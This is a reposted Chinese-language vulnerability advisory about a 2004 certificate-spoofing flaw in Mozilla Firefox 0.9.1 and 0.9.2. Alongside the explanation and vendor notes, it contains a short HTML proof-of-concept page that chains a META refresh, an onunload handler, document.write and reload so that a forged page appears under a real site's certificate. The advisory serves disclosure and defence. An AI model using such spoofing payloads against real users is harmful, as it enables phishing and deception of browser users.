Mozilla Firefox证书欺骗漏洞

2008-04-09 04:27:13来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Mozilla Firefox证书欺骗漏洞

发布日期:2004-07-25
更新日期:2004-07-28

受影响系统:
Mozilla Firefox 0.9.2
Mozilla Firefox 0.9.1
描述:
BUGTRAQ ID: 10796

Mozilla Firefox是一款流行的WEB浏览器。

Mozilla Firefox处理缓存存在问题,远程攻击者可以利用这个漏洞伪造证书,使用户无警告情况下访问伪造证书的站点。

攻击者可以使用META刷新标记指向一个目标WEB站点,然后通过使用'onunload'的BODY标记调用document.close() 函数,可使浏览器关闭刷新重定向。然后远程用户代码可使用document.write()写任意内容。而浏览器不会显示任意内容,那么使用window.location.reload()函数调用来刷新任意内容,最后导致内容在浏览器上显示。

攻击者可以精心构建HTML页面,使远程用户的URL显示在地址栏中而'secure'图标显示伪造WEB站点的证书内容。从而达到欺骗的目的。

<*来源:E.Kellinis (me@cipher.org.uk)

链接:http://marc.theaimsgroup.com/?t=109087067900001&r=1&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

E.Kellinis (me@cipher.org.uk)提供了如下测试方法:

< HTML>
< HEAD>
< TITLE>Spoofer< /TITLE>
< META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com">
< /HEAD>
< BODY
onunload="
document.close();
document.writeln('< body onload=document.close();break;>
< h3>It is Great to Use example's Cert!');

document.close();
window.location.reload();
">
< /body>

建议:
厂商补丁:

Mozilla
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mozilla.org/

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Cisco ONS控制卡畸形包远程拒绝服务漏洞

下一篇:Subversion mod_authz_svn验证用户查看受限资源漏洞